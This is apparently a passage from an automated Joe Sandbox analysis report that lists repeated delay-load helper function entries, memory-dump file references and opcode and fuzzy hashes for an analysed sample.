Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d1c0478d2b31b6fd9974e9ea5593c3fbc1c08ce1247842a0238a07f608b3c58a
Instruction ID: e80923f91f171207d189a7fe22f812ed2dc0c59f98c4d829c5eef61a99797ce7
Opcode Fuzzy Hash: d1c0478d2b31b6fd9974e9ea5593c3fbc1c08ce1247842a0238a07f608b3c58a
Instruction Fuzzy Hash: E6B012E637E041AC315C91566D1BF36021CF0C8B20330402AB12AD02C0EA484C0C4031

Function 007EDBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 65c68a5d4bf5b772db154e30ff14631c3aee20edeb5ede257b7527e705758259
Instruction ID: 780ae93a044211ce8117293ffbbfaa60582b3987d464d7cea96e4623a3e94f1f
Opcode Fuzzy Hash: 65c68a5d4bf5b772db154e30ff14631c3aee20edeb5ede257b7527e705758259
Instruction Fuzzy Hash: F0B012E637E146BC325C5142BC1BD37021CE0C4B20330412AB115E01C0EA484C4C4031

Function 007EDC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDC36

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c9ed425d4fcfeefad04413c1e2e9ea5477e3c51a0fde3eb147d6328c5496eb29
Instruction ID: ebebe4f49e59c893060b97c822546ab193556a71d5f9fc5577e8160f590c268c
Opcode Fuzzy Hash: c9ed425d4fcfeefad04413c1e2e9ea5477e3c51a0fde3eb147d6328c5496eb29
Instruction Fuzzy Hash: 0BB012A527E241AC315CB14AAD06D3E022CE0C8B50330451BB219D12E0E588BC084031

Function 007EDC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDC36

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 64f63658bb1a58012e32ffa7b203d7fa42fa3bb644487e592b9709f5e509c1e8
Instruction ID: a9e8def5ad15326a89c65ab925cb37bc70f9d23c8d1544d40b6a146eacf8b271
Opcode Fuzzy Hash: 64f63658bb1a58012e32ffa7b203d7fa42fa3bb644487e592b9709f5e509c1e8
Instruction Fuzzy Hash: 31B012A526E141AC315CB14AAD06D3E022CD0CCB50330851AB619D12E0E5887C084031

Function 007EDC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDC36

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e342e26f93175b614217d3be0b6bfb4ea11e89882c2d23f9391c95cfecdbccf3
Instruction ID: b57560ec9f52928f07703346908e0aa4519e46db5c68ae73da57fabcdc6020f4
Opcode Fuzzy Hash: e342e26f93175b614217d3be0b6bfb4ea11e89882c2d23f9391c95cfecdbccf3
Instruction Fuzzy Hash: 38B012A526E241BC315C7146BF06C3E022CD1C8B50330461AB215E01E0A5C87C485031

Function 007ED8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6d6f64c7ed9a590d9b3ba5c47f3d261178fc78b03bb7bb7e862f9bdb403b39e4
Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
Opcode Fuzzy Hash: 6d6f64c7ed9a590d9b3ba5c47f3d261178fc78b03bb7bb7e862f9bdb403b39e4
Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430

Function 007ED979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4c39061c71380cdf304b90c55979c21561cf24e4c1f786ad2d3a2b7896d13983
Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
Opcode Fuzzy Hash: 4c39061c71380cdf304b90c55979c21561cf24e4c1f786ad2d3a2b7896d13983
Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430

Function 007ED96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 56f1383f3ffa79a30de972ac1897f3ee78d14344bc3cf408bfebe8d35965619d
Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
Opcode Fuzzy Hash: 56f1383f3ffa79a30de972ac1897f3ee78d14344bc3cf408bfebe8d35965619d
Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430

Function 007ED965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7b98bb3a143ad546a53d2564d7c7440c72edc54703c45cc6a578a4e4664fb949
Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
Opcode Fuzzy Hash: 7b98bb3a143ad546a53d2564d7c7440c72edc54703c45cc6a578a4e4664fb949
Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430

Function 007ED95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e6e6dbf2056e80121c51dd1e6a716d8d3fb20edb0001303c159d6dcfb9be904e
Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
Opcode Fuzzy Hash: e6e6dbf2056e80121c51dd1e6a716d8d3fb20edb0001303c159d6dcfb9be904e
Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430

Function 007ED951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f69c8c4edfb901030569601d8de2988204d5155fb18ece74099792991bf3cbc3
Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
Opcode Fuzzy Hash: f69c8c4edfb901030569601d8de2988204d5155fb18ece74099792991bf3cbc3
Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430

Function 007ED93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 51c2fdc0ae1090d0fc9adb8685b48090474ed3ce06e17074a968a3f7d8f30774
Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
Opcode Fuzzy Hash: 51c2fdc0ae1090d0fc9adb8685b48090474ed3ce06e17074a968a3f7d8f30774
Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430

Function 007ED91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 14924fd2d263d723da3a21a7f53b6b4aa665ce73c14ff3b97de4a091867181f1
Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
Opcode Fuzzy Hash: 14924fd2d263d723da3a21a7f53b6b4aa665ce73c14ff3b97de4a091867181f1
Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430

Function 007ED997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b81e4527665b3fa0c47f8864d1cb1029db63a260e785a968fa4a5c1746d251f3
Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
Opcode Fuzzy Hash: b81e4527665b3fa0c47f8864d1cb1029db63a260e785a968fa4a5c1746d251f3
Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430

Function 007ED98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8c64d69dc72efa8ca72198a36496a6f8f436d27b5b75861e0edcb33037714a58
Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
Opcode Fuzzy Hash: 8c64d69dc72efa8ca72198a36496a6f8f436d27b5b75861e0edcb33037714a58
Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430

Function 007ED983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a1e580153f00bd471a42c0678dd7f0fef89e6ac225fafd2a4f3e64d0027a4b55
Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
Opcode Fuzzy Hash: a1e580153f00bd471a42c0678dd7f0fef89e6ac225fafd2a4f3e64d0027a4b55
Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430

Function 007EDAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c6a826b6c0a15e0fd4cbd0024c1fa4ca9d1eb0d70ba0ba6e174bffaad13990c
Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
